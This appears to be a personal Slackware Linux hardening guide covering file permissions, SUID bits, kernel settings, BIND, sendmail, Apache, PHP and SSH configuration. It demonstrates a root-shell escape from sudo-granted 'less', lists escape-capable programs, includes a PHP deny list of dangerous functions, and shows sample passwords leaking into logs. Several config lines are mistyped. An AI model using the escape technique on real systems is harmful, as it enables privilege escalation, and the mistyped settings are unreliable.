dentonj@darkstar:~$ If the following line shows up: INET:localhost dentonj@darkstar:~$ xhost -localhost man xhost man Xsecurity man Xau man Xserver /etc/kde/kdm/kdmrc: You may not want to set some of these. For example, if the system uses a runlevel of 4 and is installed on a laptop, you may want to set "AllowShutdown=ALl". Read the comments in the file. [Xdmcp] Enable=false Port=0 Willing= [X-*-Core] AllowRootLogin=false AllowNullPasswd=false AllowShutdown=Root AllowSdForceNow=Root UseSessReg=true [X-:*-Core] ServerArgsLocal=-nolisten tcp AllowNullPasswd=false AllowShutdown=Root NoPassEnable=false #NoPassUsers= [X-:0-Core] AutoLoginEnable=false #AutoLoginUser= #AutoLoginPass= dentonj@darkstar:~# /usr/share/config/kdm/Xwilling 2 users, load: 0.00, 0.00, 0.00 /kde/kde/kdm/Xaccess: Comment out the following lines: #* #any host can get a login window #* CHOOSER BROADCAST #any indirect host can get a chooser Access Control Lists: /etc/fstab: Add the acl mount option: /dev/sda3 / ext4 defaults,acl 1 1 root@darkstar:~# mount /dev/root on / type ext4 (rw,relatime,barrier=1,data=ordered) root@darkstar:~# mount -o remout,rw,relatime,barrier=1,data=ordered / root@darkstar:~# mount /dev/root on / type ext4 (rw,relatime,acl,barrier=1,data=ordered) root@darkstar:~# touch test root@darkstar:~# getfacl test # file: test # owner: root # group: root user::rw- group::r-- other::r-- root@darkstar:~# setfacl -m u:dentonj:rw test root@darkstar:~# getfacl test # file: test # owner: root # group: root user::rw- user:dentonj:rw- group::r-- mask::rw- other::r-- man acl man setfacl man getfacl /etc/inittab: Comment out the following line: #ca::ctraltdel:/sbin/shutdown -t5 -r now root@darkstar:~# telinit q [rant] I actually don't think this is necessary. But I'm including it because just about every security document on Linux recommends it. It stops anyone from being able to reboot the system by doing a three finger salute. Pressing Ctrl-Alt-Del to reboot the system only works if you have physical access to the keyboard. Even if you disable this feature, it doesn't stop someone from pulling the power cord or pressing the reset switch to force a reboot. Most window managers trap Ctrl-Alt-Del anyways. The only time that I see disabling the above line as being useful is when you have a Windows admin using Linux. You don't want them rebooting the system every time they want to lock the system or go to the Task Manager. Or you can use /etc/shutdown.allow to control when (not exactly who) the system can be rebooted with Ctrl-Alt-Del. There are security concerns with using this method. Check the man page for shutdown for details. [/rant] Add "-a" to the following line in /etc/inittab to use /etc/shutdown.allow: ca::ctraltdel:/sbin/shutdown -t5 -r now -a root@darkstar:~# telinit q I like to use dumb terminals. Uncomment the following line: s1:12345:respawn:/sbin/agetty -L ttyS0 9600 vt100 root@darkstar:~# telinit q man init man inittab man initscript man shutdown man telinit /etc/shutdown.allow: dentonj man shutdown /etc/securetty: Make sure only the following are uncommented: console tty1 tty2 tty3 tty4 tty5 tty6 man securetty umask: There are several ways to set umask: /etc/login.defs: UMASK 077 /etc/limits: * K077 /etc/profile: umask 077 Umask controls what the initial permissions are for newly created files and directories. With a umask of 022, new files have the permissions of 644 and new directories have the permissions of 755. Setting the umask to 077 will result in new files being created with the permissions of 600 and new directories will have the permissions of 700. Using the umask of 077 will keep others from being able to access users files. Using a umask of 022 will allow others access to the users files unless the users takes the time to change the permissions. You can use cron to periodically remove permissions from the user's home directories. Setting a restrictive umask can cause problems when you commonly edit or create files that need to be read accessable to everyone. An example of files that everyone needs to be able to read are web server pages located in /srv/httpd/htdocs. dentonj@darkstar:~$ type -a umask man bash man umask man login.defs man limits ----[ Filesystem ]---- /etc/fstab: /dev/sda1 swap swap defaults 0 0 /dev/sda2 / ext4 defaults,acl 1 1 /dev/sda6 /var ext4 rw,nosuid,nodev,acl,relatime,barrier=1,data=ordered 0 2 /dev/sda7 /tmp ext4 rw,nosuid,nodev,noexec,acl,relatime,barrier=1,data=ordered 0 2 /dev/sda8 /usr ext4 ro,acl 0 2 /dev/sda9 /home ext4 rw,nosuid,nodev,acl,relatime,barrier=1,data=ordered 0 0 /dev/sdb1 /mnt/windows vfat rw,nosuid,nodev,noexec,noauto 0 0 /dev/sdb2 /mnt/slack ext2 rw,noauto 0 0 /dev/cdrom /mnt/cdrom auto noauto,owner,ro 0 0 /dev/fd0 /mnt/floppy auto noauto,owner 0 0 devpts /dev/pts devpts gid=5,mode=620 0 0 proc /proc proc defaults 0 0 tmpfs /dev/shm tmpfs defaults 0 0 root@darkstar:~# mkdir /mnt/windows root@darkstar:~# mkdir /mnt/slack root@darkstar:~# mkdir /mnt/floppy root@darkstar:~# mkdir /mnt/thumb The lines need to wrap. Mount complains about bad options if "\" is used to break up the lines. Mounting /usr as read-only use to work, but I have not tested it with Slackware 13.1. Running "lsof" didn't turn up files that looked like they may be written to in /usr. Your mileage may vary. Test extensively before using in a production environment. Before packages can be updated, /usr would have to be remounted as rw. This is more of a good idea fairy type of idea. I'm on the fence as to whether or not it adds any security to the system. man fstab man nfs man mount I use to add "noexec" to /home, but that mount option is pretty trivial to bypass. Besides, I like having a ~/bin directory for my scripts. dentonj@darkstar:~$ /lib/ld-linux.so.2 ./some_executable man ld.so /sbin/tune2fs: root@darkstar:~# tune2fs -l /dev/sda3 man tune2fs man fsck /usr/bin/chattr: TODO Make these files immutable: - init/rc scripts - shell, environment, login config files - passwd files - server config files - suid/sgid executables - commonly trojaned executables for i in `ls /etc/rc.d`; do chattr +i /etc/rc.d/$i done for i in `ls /etc/apache`; do chattr +i /etc/apache/$i done for i in `ls /etc/mail`; do chattr +i /etc/mail/$i done find / -type f \( -perm -4000 -o -perm -2000 \) -exec chattr +i {} \; chattr +i /etc/at.deny chattr +i /etc/exports chattr +i /etc/ftpusers chattr +i /etc/host.conf chattr +i /etc/hosts chattr +i /etc/hosts.allow chattr +i /etc/hosts.deny chattr +i /etc/hosts.equiv chattr +i /etc/hosts.lpd chattr +i /etc/inetd.conf chattr +i /etc/inittab chattr +i /etc/lilo.conf chattr +i /etc/login.access chattr +i /etc/login.defs chattr +i /etc/named.conf chattr +i /etc/porttime chattr +i /etc/profile chattr +i /etc/protocols chattr +i /etc/securetty chattr +i /etc/services chattr +i /etc/suauth chattr +i /home/dentonj/.forward chattr +i /home/dentonj/.netrc chattr +i /home/dentonj/.rhosts chattr +i /home/dentonj/.shosts less /usr/local/sbin/chkrootkit /TROJAN chattr +i <the commands listed in the variable TROJAN> This list should be much longer. root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr man chattr lcap: TODO TODO - list where is can be found and how to compile it. Remove the CAP_LINUX_IMMUTABLE kernel capability. This prevents the +i attribute from being removed. I run `lcap` from rc.local. This file is sourced from the file rc.M. To remove the +i attribute from a file, you'll have to reboot the system and go into single user mode. This is one of the few times when you really have to reboot Linux. If you only access and manage the system remotely, using lcap may cause problems. Note: Do this after you are finished with configuring your system. /etc/rc.d/rc.local: /usr/local/sbin/lcap CAP_LINUX_IMMUTABLE root@darkstar:~# touch /tmp/test root@darkstar:~# chattr +i /tmp/test root@darkstar:~# lsattr /tmp/test ----i-------- /tmp/test root@darkstar:~# cd root@darkstar:~# lcap CAP_LINUX_IMMUTABLE root@darkstar:~# chattr -i /tmp/test chattr: Operation not permitted while setting flags on /tmp/test root@darkstar:~# lcap Current capabilities: 0xFFFFFCFF 0) *CAP_CHOWN 1) *CAP_DAC_OVERRIDE 2) *CAP_DAC_READ_SEARCH 3) *CAP_FOWNER 4) *CAP_FSETID 5) *CAP_KILL 6) *CAP_SETGID 7) *CAP_SETUID 8) CAP_SETPCAP 9) CAP_LINUX_IMMUTABLE 10) *CAP_NET_BIND_SERVICE 11) *CAP_NET_BROADCAST 12) *CAP_NET_ADMIN 13) *CAP_NET_RAW 14) *CAP_IPC_LOCK 15) *CAP_IPC_OWNER 16) *CAP_SYS_MODULE 17) *CAP_SYS_RAWIO 18) *CAP_SYS_CHROOT 19) *CAP_SYS_PTRACE 20) *CAP_SYS_PACCT 21) *CAP_SYS_ADMIN 22) *CAP_SYS_BOOT 23) *CAP_SYS_NICE 24) *CAP_SYS_RESOURCE 25) *CAP_SYS_TIME 26) *CAP_SYS_TTY_CONFIG * = Capabilities currently allowed /etc/cron.*: root@darkstar:~# chmod -R go-rwx /etc/cron.* /etc/rc.d: The system startup scripts are world readable by default. root@darkstar:~# chmod -R go-rwx /etc/rc.d/ $HOME: Limit access to $HOME directories: root@darkstar:~# chmod -R go-wrx /home/dentonj root@darkstar:~# chmod -R go-rwx /root man chmod /var/log: Limit access to logs: root@darkstar:~# chmod -R o-rwx /var/log The following files should be empty if they exist: /etc/X0.hosts /etc/d_passwd /etc/dialups /etc/environment /etc/exports /etc/hosts.lpd /etc/hosts.equiv /etc/ssh/shosts.equiv ~/.forward ~/.netrc ~/.rhosts ~/.shosts Files that normally shouldn't exist: /etc/fastboot /etc/forcefsck /etc/hushlogins /etc/initrunlvl /etc/initscript /etc/nologin /etc/powerstatus /etc/upsstatus ~/.hushlogin Find SUID/SGID files and directories: root@darkstar:~# find / -type f \( -perm -4000 -o -perm -2000 \) \ > -ls > suid_files.out root@darkstar:~# find / -type d \( -perm -4000 -o -perm -2000 \) \ > -ls > suid_dirs.out Find world and group writable files and directories: root@darkstar:~# find / -type f \( -perm -2 -o -perm -20 \) \ > -ls > write_files.out root@darkstar:~# find / -type d \( -perm -2 -o -perm -20 \) \ > -ls > write_dirs.out SUID/SGID: TODO Remove the SUID or SGID bit from the following files: chmod u-s /usr/bin/at chmod u-s /usr/bin/chage chmod u-s /usr/bin/chfn chmod u-s /usr/bin/chsh chmod u-s /usr/bin/crontab chmod u-s /usr/bin/expiry chmod u-s /usr/bin/gpasswd chmod u-s /usr/bin/lppasswd chmod u-s /usr/bin/newgrp chmod u-s /usr/bin/rcp chmod u-s /usr/bin/rlogin chmod u-s /usr/bin/rsh chmod u-s /usr/libexec/ssh-keysign man chmod Shell Escapes: The following is a list of programs that can escape to a shell. This can either be done by directly starting a new shell, executing shell commands (which is used to start a shell), or by opening an text editor that can be used to start a shell. These programs are not a security concern by themselves. However, if they are set SUID root or used with sudo, the programs can allow users access to a root shell. /etc/sudoers: dentonj ALL = (ALL) /usr/bin/less /var/log/messages Start a new shell: dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages Password: <contents of /var/log/messages> ! bash-3.00# Open an editor that can start a new shell: dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages Password: <contents of /var/log/messages> v :sh bash-3.00# Make sure these are not SUID and owned by root. Also make sure they don't end up in /etc/sudoers. This list is not complete. /bin/ed /bin/more /usr/bin/bzmore /usr/bin/crontab -e /usr/bin/cscope /usr/bin/cu /usr/bin/cvs -e /usr/bin/cvsbug /usr/bin/elm /usr/bin/elvis /usr/bin/ex /usr/bin/flea /usr/bin/gccbug /usr/bin/gdb /usr/bin/less /usr/bin/lftp /usr/bin/mailto /usr/bin/mc /usr/bin/mcedit /usr/bin/mcview /usr/bin/mutt /usr/bin/mysql /usr/bin/mysqlbug /usr/bin/nail /usr/bin/ncftp /usr/bin/newspost /usr/bin/nn /usr/bin/perlbug /usr/bin/pilot /usr/bin/pine /usr/bin/pg /usr/bin/rpcclient /usr/bin/sdiff /usr/bin/slrn /usr/bin/smbclient /usr/bin/tin /usr/bin/trn /usr/bin/uupick /usr/bin/vim /usr/bin/zmore A couple of the things that I used to figure out which commands allow shell escapes. root@darkstar:~# cd /usr/bin && for i in `ls | grep -v "@$"`; do > echo " $i" > strings $i | grep -e "VISUAL|EDITOR" > done | less root@darkstar:~# cd /usr/man/man1 && zgrep -E \ > "\!.*command|execute.*command" * Find and delete dead symlinks: find / -type l -print | perl -nle '-e || print' ----[ Network ]---- /etc/rc.d/rc.local: # Stop arp spoofing used to sniff switched networks # Set a static ARP entry for the default gateway arp -s 192.168.1.1 00:00:FE:ED:FA:CE # Set a static ARP entry for the log host arp -s 192.168.1.2 00:00:DE:AD:BE:EF /etc/rc.d/rc.firewall: The file /etc/rc.d/rc.inet2 check for the existance and then runs rc.firewall. Create a firewall script and place it here. ----[ Cron ]---- /etc/cron.daily/ntpdate: #!/bin/sh /usr/sbin/ntpdate clock.via.net && /sbin/hwclock --systohc root@darkstar:~# chmod 700 /etc/cron.daily/ntpdate /etc/cron.daily/cleanup: #!/bin/sh /usr/bin/find / -type f -name core -exec /bin/rm -f {} \; /usr/bin/find /tmp -atime +7 -exec /bin/rm -f {} \; /usr/bin/find /var/tmp -atime +7 -exec /bin/rm -f {} \; root@darkstar:~# chmod 700 /etc/cron.daily/cleanup /etc/cron.daily/paranoid: #!/bin/sh /bin/chmod -R go-rwx /home/dentonj /bin/chmod -R go-rwx /root /bin/chmod -R o-rwx /var/log /bin/rm -f /home/dentonj/dead.letter root@darkstar:~# chmod 700 /etc/cron.daily/paranoid /var/spool/cron/crontabs/root: 0 3 * * * /usr/bin/find /home -name .rhosts -o -name .forward -ls Cron should mail the results to root. root@darkstar:~# crontab -l root@darkstar:~# crontab -e man crond man crontab /etc/at.allow: root@darkstar:~# rm /etc/at.deny root@darkstar:~# touch /etc/at.allow Don't allow anyone to use at. Even better, remove at from the system: root@darkstar:~# removepkg at man at ----[ Bash ]---- ~/.bash_history: Set the history file so that it can only be appended and not erased by a user. root@darkstar:~# chattr +a /home/dentonj/.bash_history root@darkstar:~# chmod go-wrx /usr/bin/chattr /usr/bin/lsattr man chattr man lsattr man chmod ~/.bash_profile: trap 'test -n "$SSH_AGENT_PID" && eval `/usr/bin/ssh-agent -k`' 0 ----[ Kernel ]---- /etc/sysctl.conf: # Improve file system performance vm.bdflush = 60 64 64 256 500 300 80 0 0 # Increase swap bandwidth system performance vm.kswapd = 512 32 32 # Enables/Disables memory over commitment vm.overcommit_memory = 0 # Increases number of page tables keeps in a per-processor cache vm.pagetable_cache = 25 50 # Increase limit of file-handles fs.file-max = 8192 # Enable/Disable ignoring ping request net.ipv4.icmp_echo_ignore_all = 1 # Enable/Disable ignoring broadcasts request net.ipv4.icmp_ignore_broadcasts = 1 # Enable/Disable IP source routing net.ipv4.conf.all.accept_source_route = 0 net.ipv4.conf.default.accept_source_route = 0 # Enable/Disable TCP SYN cookie protection net.ipv4.tcp_syncookies = 1 # Enable/Disable ICMP redirect acceptance net.ipv4.conf.all.accept_redirects = 0 net.ipv4.conf.default.accept_redirects = 0 # Enable/Disable bad error message protection net.ipv4.icmp_ignore_bogus_error_responses = 1 # Enable/Disable IP spoofing protection net.ipv4.conf.all.rp_filter = 2 net.ipv4.conf.default.rp_filter = 2 # Enable/Disable log spoofed, source routed,redirect packets net.ipv4.conf.all.log_martians = 1 net.ipv4.conf.default.log_martions = 1 # Improve shared memory size kernel.shmall = 134217728 kernel.shmmax = 134217728 # Improve default and maximum window sizes net.core.vmem_max = 2048000 net.core.vmem_default = 204800 # Enable packet forwarding net.ipv4.ip_forward = 0 # Change the default TTL to help obscure OS fingerprinting net.ipv4.ip_default_ttl = 128 root@darkstar:~# sysctl -p /etc/sysctl.conf root@darkstar:~# sysctl -A These is already an entry in /etc/rc.d/rc.S that will set the sysctl settings located in this file during bootup. man sysctl man sysctl.conf /etc/rc.d/rc.modules: List the kernel modules that are loaded during bootup. Comment out the ones you feel are unnecessary. root@darkstar:~# grep -v "^#\|^$" /etc/rc.d/rc.modules Grsecurity: TODO Remove support for kernel modules: From Phrack 25-5, "Unix Cracking Tips": "After you gain superuser privileges and you wish to stay root, here are a few suggestions for installing backdoors: . . . - Install new system calls . . ." Then read Phrack 52-8, "Weakening the Linux Kernel". Then compile your kernel to remove supports for modules. CONFIG_MODULES=n ----[ Misc Stuff ]---- /etc/inputrc: set bell-style none set mark-directories on set mark-modified-lines on set match-hidden-files on set show-all-if-ambiguous on set visible-stats on man bash man readline Stuff to remove: root@darkstar:~# removepkg nn root@darkstar:~# removepkg slrn root@darkstar:~# removepkg uucp root@darkstar:~# removepkg strace root@darkstar:~# removepkg gdb root@darkstar:~# removepkg nc root@darkstar:~# removepkg nmap root@darkstar:~# removepkg at This list should be much longer. /etc/rc.d/rc.local: # This is hard drive specific, your settings will vary /usr/sbin/hdparm -c3 -a16 -W1 -u1 /dev/hdb # Turn on NumLock /usr/bin/setleds -D +num Make a backup of commonly trojaned commands: Only do this after a fresh install. Making copies of already trojaned commands will just ruin your day. If you don't have a fresh install, copy the commands from the "Live" CD that comes with the official version of Slackware. root@darkstar:~# mkdir bin Copy the following to /root/bin: /bin/date /bin/du /bin/echo /bin/grep /bin/kill /bin/killall /bin/login /bin/ls /bin/netstat /bin/ps /bin/su /bin/tar /sbin/agetty /sbin/explodepkg /sbin/getty /sbin/ifconfig /sbin/installpkg /sbin/makepkg /sbin/pidof /sbin/removepkg /sbin/upgradepkg /usr/bin/basename /usr/bin/biff /usr/bin/chfn /usr/bin/chsh /usr/bin/crontab /usr/bin/dirname /usr/bin/env /usr/bin/find /usr/bin/lsattr /usr/bin/nail /usr/bin/passwd /usr/bin/pstree /usr/bin/ssh /usr/bin/top /usr/bin/traceroute /usr/bin/write /usr/sbin/gpm /usr/sbin/hdparm /usr/sbin/in.fingerd /usr/sbin/in.identd /usr/sbin/in.rlogind /usr/sbin/in.rshd /usr/sbin/in.telnetd /usr/sbin/in.timed /usr/sbin/inetd /usr/sbin/ipop3d /usr/sbin/named /usr/sbin/rpcinfo /usr/sbin/sendmail /usr/sbin/sshd /usr/sbin/syslogd /usr/sbin/tcpd root@darkstar:~# cd bin root@darkstar:~/bin# md5sum * >> md5sum root@darkstar:~/bin# cd root@darkstar:~# tar zcvf bin.tar.gz ./bin root@darkstar:~# cp bin.tar.gz /mnt/thumb It would be a good idea to run `chattr +i ...` on all of the original files. Passwords in logs and history files: It's not uncommon for someone to make a mistake while logging in or switching users and type the password in the wrong place. Be aware that "dumpster diving" in system logs and other users history files is a common practice by evil doers to obtain passwords. Keep this in mind when deciding to store 6 months worth of logs or when setting HISTFILESIZE to a $LARGENUMBER. This is lastb output on a Slackware 11.0 system: root@darkstar:~# lastb P@ssw0rd1! Fri Jun 23 19:04 - 19:04 (00:00) dentonj Fri Jun 23 19:03 - 19:03 (00:00) The output of lastb is different in Slackware 13.1, with long usernames being truncated. root@darkstar:~# lastb mysupers tty3 Sun Aug 18 15:35 - 15:35 (00:00) dentonj tty3 Sun Aug 18 13:16 - 13:16 (00:00) root@darkstar:~# strings /var/log/btmp | grep mysupers mysupersecretpassword root@darkstar:~# less /home/dentonj/.bash_history <contents of .bash_history> /us <-- type this to search for "us" . . . us - !QAZzaq1 . . . /etc/wgetrc: Ignore the robots.txt file on web servers. robots = off ----[ Program Hardening ]---- /usr/sbin/atalkd: TODO /etc/netatalk/atalkd.conf: /etc/netatalk/afpd.conf: /etc/netatalk/AppleVolumes.default: /etc/netatalk/AppleVolumes.system: /etc/netatalk/netatalk.conf: /etc/netatalk/papd.conf: man afpd man afpd.conf man AppleVolumes.default man atalkd man atalkd.conf man netatalk.conf man papd /usr/sbin/named: /etc/named.conf: acl "allowed" { localhost; 192.168.1.0/24; }; acl "denied" { 0.0.0.0/8; 1.0.0.0/8; 2.0.0.0/8; 5.0.0.0/8; 7.0.0.0/8; 10.0.0.0/8; 23.0.0.0/8; 27.0.0.0/8; 31.0.0.0/8; 36.0.0.0/8; 37.0.0.0/8; 39.0.0.0/8; 42.0.0.0/8; 49.0.0.0/8; 50.0.0.0/8; 92.0.0.0/8; 93.0.0.0/8; 94.0.0.0/8; 95.0.0.0/8; 100.0.0.0/8; 101.0.0.0/8; 102.0.0.0/8; 103.0.0.0/8; 104.0.0.0/8; 105.0.0.0/8; 106.0.0.0/8; 107.0.0.0/8; 108.0.0.0/8; 109.0.0.0/8; 110.0.0.0/8; 111.0.0.0/8; 112.0.0.0/8; 113.0.0.0/8; 114.0.0.0/8; 115.0.0.0/8; 116.0.0.0/8; 117.0.0.0/8; 118.0.0.0/8; 119.0.0.0/8; 120.0.0.0/8; 169.254.0.0/16; 172.16.0.0/12; 173.0.0.0/8; 174.0.0.0/8; 175.0.0.0/8; 176.0.0.0/8; 177.0.0.0/8; 178.0.0.0/8; 179.0.0.0/8; 180.0.0.0/8; 181.0.0.0/8; 182.0.0.0/8; 183.0.0.0/8; 184.0.0.0/8; 185.0.0.0/8; 186.0.0.0/8; 187.0.0.0/8; 192.0.2.0/24; //192.168.0.0/16; 197.0.0.0/8; 223.0.0.0/8; 224.0.0.0/3; }; key "rndc-key" { algorithm hmac-md5; secret "Thisisafakekey=="; }; controls { inet 127.0.0.1 port 953 allow { 127.0.0.1; } keys { "rndc-key"; }; }; options { directory "/var/named"; pid-file "/var/named/named.pid"; statistics-file "/var/named/named.stats"; memstatistics-file "/var/named/named.memstats"; dump-file "/var/named/named.dump"; zone-statistics yes; transfer-format many-answers; interface-interval 0; allow-transfer { none; }; allow-query { allowed; }; allow-recursion { allowed; }; blackhole { denied; }; tcp-clients 32; forwarders { 1.2.3.4; 5.6.7.8; }; version none; hostname none; rfc2038-type1 no; }; logging { channel default_syslog { syslog daemon; severity info; stderr; print-category yes; print-severity yes; }; channel query_log { file "/var/log/named.queries" versions 6 size 20m; severity info; print-time; print-category yes; print-severity yes; }; category default { default_syslog; }; category general { default_syslog; }; category security { default_syslog; }; category config { default_syslog; }; category resolver { default_syslog; }; category xfer-in {default_syslog; }; category xfer-out {default_syslog; }; category notify { default_syslog; }; category client { default_syslog; }; category network { default_syslog; }; category update { default_syslog; }; category update-security { default_syslog; }; category lame-servers { default_syslog; }; category queries { query_log; }; category database { default_syslog; }; category unmatched { default_syslog; }; catefory dispatch { default_syslog; }; category dnssec { default_syslog; }; category delegation-only { default_syslog; }; }; zone "." IN { type hint; file "caching-example/named.ca"; }; zone "localhost" IN { type master; file "caching-example/named.local"; allow-update { none; }; notify no; }; zone "0.0.127.in-addr.arpa" IN { type master; file "caching-example/named.local"; allow-update { none; }; notify no; }; /etc/rndc.conf: key "rndc-key" { algorithm hmac-md5; secret "Thisisafakekey=="; }; options { default-key "rndc-key"; default-server 127.0.0.1; default-port 953; }; root@darkstar:~# groupadd -g 53 named root@darkstar:~# useradd -c "BIND" -d /var/named -g 53 -u 53 \ -s /bin/false named root@darkstar:~# dig @a.root-servers.net . ns > \ /var/named/caching-example/named.ca root@darkstar:~# chmod 600 /etc/named.conf root@darkstar:~# chown named.named /etc/named.conf root@darkstar:~# chmod 600 /etc/rndc.conf root@darkstar:~# chown named.named /etc/rndc.conf root@darkstar:~# chown -R named.named /var/named/ root@darkstar:~# chown named.named /var/run/named/ /etc/rc.d/rc.bind: /usr/sbin/named -u named To generate the keys for rndc: root@darkstar:~# rndc-confgen -b 512 To check the configuration: root@darkstar:~# named-checkconf -z zone localhost/IN: loaded serial 42 zone 0.0.127.in-addr.arpa/IN: loaded serial 1997022700 root@darkstar:~# named-checkzone localhost \ /var/named/caching-example/localhost.zone zone localhost/IN: loaded serial 42 OK root@darkstar:~# named-checkzone 0.0.127.in-addr.arpa \ /var/named/caching-example/named.local zone 0.0.127.in-addr.arpa/IN: loaded serial 1997022700 OK root@darkstar:~# named-checkzone . /var/named/caching-example/named.ca zone ./IN: has 0 SOA records root@darkstar:~# chmod 700 /etc/rc.d/rc.bind root@darkstar:~# /etc/rc.d/rc.bind start root@darkstar:~# rndc status man named man named-checkconf man named-checkzone man rndc man rndc.conf man rndc-confgen man lwresd dentonj@darkstar:~$ links /usr/doc/bind-9.3.2-P1/arm/Bv9ARM.html The above example sets up BIND as a caching only DNS server. "Explain benefits." The problem with this setup is that you are running a daemon that isn't entirely necessary. Unnecessary services can potentially provide an attacker with more information then they should have or they can provide an attacker with a way to break into your system. Unless you are setting up a caching name server as a way of learning how to setup and run BIND, you are better off removing BIND from the system. One of the problems with removing the BIND package on Slackware is the useful commands "dig", "host", and "nslookup" will also be removed. root@darkstar:~# removepkg bind TODO - Chroot /usr/sbin/sendmail: /etc/mail/sendmail.cf: #O DontBlameSendmail=Safe O MaxHopCount=25 O HelpFile=/etc/issue.net O ForwardPath=/etc/forward O LogLevel=15 #O DaemonPortOptions=Name=MTA #O DaemonPortOptions=Port=587,Name=MSA,M=E O DaemonPortOptions=Address=127.0.0.1 O ClientPortOptions=Family=inet,Address=127.0.0.1 O PrivacyOptions=goaway,noreceipts,restrictmailq,restrictqrun, restrictexpand,noetrn,nobodyreturn O Timeout.ident=0 O SmtpGreetingMessage=$j Unauthorized Access Prohibited. O AllowBogusHELO=False O UnsafeGroupWrites=True O RrtImpliesDSN=False $.by $j with id $i$?{tls_version} root@darkstar:~# touch /etc/forward $HOME/.forward: The .forward file allows users to easily forward email. However, the file can also be used to run a program every time an email is received. There are several ways to disable use of the .forward file. Set the ForwardPath option so that it points to something other than the default. The option has to be set to something, otherwise sendmail sets ForwardPath to $HOME/.forward. O ForwardPath=/etc/forward You can allow programs to be run, but restrict which ones can be run by using smrsh. You can disable forwarding in sendmail all together. However, the bat book warns that Bad Things(TM) can happen is you completely disable forwarding. Remove the "w" flag from the line located in /etc/mail/sendmail.cf: Mlocal, P=/usr/bin/procmail, F=lsDFMAw5:/|@qSPfhn9, S=..... Mlocal, P=/usr/bin/procmail, F=lsDFMA5:/|@qSPfhn9, S=..... You can try to have root create and own the .forward file in each of the user's home directories. But the user can move the .forward file and create a new file. root@darkstar:~# touch /home/dentonj/.forward dentonj@darkstar:~$ ls -l .forward -rw-r--r-- 1 root root 0 2001-06-27 20:17 .forward dentonj@darkstar:~$ mv .forward .forward.moved dentonj@darkstar:~$ ls -l .forward.moved -rw-r--r-- 1 root root 0 2001-06-27 20:17 .forward.moved However, making the file immutable stops this. root@darkstar:~# touch /home/dentonj/.forward root@darkstar:~# chattr +i /home/dentonj/.forward root@darkstar:~# lsattr /home/dentonj/.forward ----i-------- /home/dentonj/.forward root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr dentonj@darkstar:~$ ls -l .forward -rw-r--r-- 1 root root 0 2001-06-27 20:19 .forward dentonj@darkstar:~$ mv .forward .forward.moved mv: cannot move `.forward' to `.forward.moved': Operation not permitted /usr/sbin/smrsh: TODO /etc/mail/aliases: I use to comment out most of these. Now I'm more interested if someone actually tries to send email to any of them. postmaster: root, dentonj bin: root, dentonj daemon: root, dentonj games: root, dentonj ingres: root, dentonj nobody: root, dentonj system: root, dentonj toor: root, dentonj uucp: root, dentonj manager: root, dentonj dumper: root, dentonj webmaster: root, dentonj abuse: root, dentonj decode: root, dentonj Add any additional system account present in /etc/passwd: admin: root, dentonj ftp: root, dentonj mail: root, dentonj mysql: root, dentonj smmsp: root, dentonj sshd: root, dentonj root@darkstar:~# newaliases man aliases man newaliases If you only need to run sendmail for local mail, use cron. root@darkstar:~# /etc/rc.d/rc.sendmail stop root@darkstar:~# chmod 600 /etc/rc.d/rc.sendmail /etc/cron.hourly/mqueue #!/bin/sh /usr/sbin/sendmail -q root@darkstar:~# chmod 700 /etc/cron.hourly/mqueue man crond /usr/sbin/httpd: root@darkstar:~# groupadd -g 80 http root@darkstar:~# useradd -u 80 -g 80 http /etc/apache/httpd.conf: #LoadModule includes_module libexec/apache/mod_include.so #LoadModule autoindex_module libexec/apache/mod_autoindex.so #LoadModule speling_module libexec/apache/mod_speling.so #LoadModule userdir_module libexec/apache/mod_userdir.so #LoadModule anon_auth_module libexec/apache/mod_auth_anon.so #LoadModule digest_module libexec/apache/mod_digest.so #LoadModule proxy_module libexec/apache/mod_proxy.so #LoadModule cern_meta_module libexec/apache/mod_cern_meta_module.so #LoadModule usertrack_module libexec/apache/mod_usertrack.so #LoadModule unique_id_module libexec/apache/mod_unique_id.so #AddModule mod_includes.c #AddModule mod_autoindex.c #AddModule mod_speling.c #AddModule mod_userdir.c #AddModule mod_auth_anon.c #AddModule mod_digest.c #AddModule mod_proxy.c #AddModule mod_cern_meta.c #AddModule mod_usertrack.c #AddModule mod_unique_id.c User http Group http ServerAdmin root@localhost <Directory "/var/www/htdocs"> Options FollowSymLinks MultiViews UseCanonicalName Off LogLevel info LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" CustomLog /var/log/apache/access_log combined ServerSignature Off ServerTokens ProductOnly <Directory "/var/www/icons"> Options MultiViews #Alias /manual/ "/var/www/htdocs/manual/" #<Directory "/var/www/htdocs/manual"> # Options Indexes FollowSymLinks MultiViews # AllowOverride None # Order allow,deny # ALlow from all #</Directory> #ScriptAlias /cgi-bin/ "/var/www/cgi-bin/" #<Directory "/var/www/cgi-bin"> # AllowOverride None # Options None # Order allow,deny # Allow from all #</Directory> # /etc/logrotate.d/httpd: # /var/log/apache/access_log /var/log/apache/error_log { # create 0640 root root # mail dentonj@gmail.com # mailfirst # sharedscripts # postrotate # /bin/kill -HUP `cat /var/run/httpd.pid \ # 2> /dev/null || true` # endscript # } /etc/logrotate.d/httpd: /var/log/httpd/*_log { rotate 26 notifempty size=5M compress delaycompress sharedscripts postrotate /etc/rc.d/rc.httpd restart endscript dentonj@darkstar:~$ links /var/www/htdocs/manual/misc/security_tips.html PHP: Fortunately, PHP is disabled by default. But if you insist on letting the script kiddies have free reign of your system, there are a few things you can do to slow them down. /etc/apache/httpd.conf: Include /etc/apache/mod_php.conf /etc/apache/php.ini: display_errors = Off log_errors = On error_log = /var/log/apache/php_errors register_globals = Off variables_order = "ES" expose_php = Off all_url_fopen = Off open_basdir = /var/www disable_functions = system,exec,shell_exec,eval,include,require,include_once,require_once,preg_replace safe_mode = On safe_mode_include_dir = /usr/php/include safe_mode_exec_dir = /usr/php/bin safe_mode_gid = On safe_mode_allowed_env_vars = PHP_ safe_mode_protected_env_vars = LD_LIBRARY_PATH root@darkstar:~# touch /var/log/apache/php_errors root@darkstar:~# mkdir -p /usr/php/include root@darkstar:~# mkdir /usr/php/bin man httpd man php /etc/ssh/ssh_config: # Host * ForwardAgent no ForwardX11 no RhostsRSAAuthentication no RSAAuthentication no PasswordAuthentication yes HostbasedAuthentication no BatchMode no CheckHostIP yes AddressFamily any ConnectTimeout 0 StrictHostKeyChecking ask # 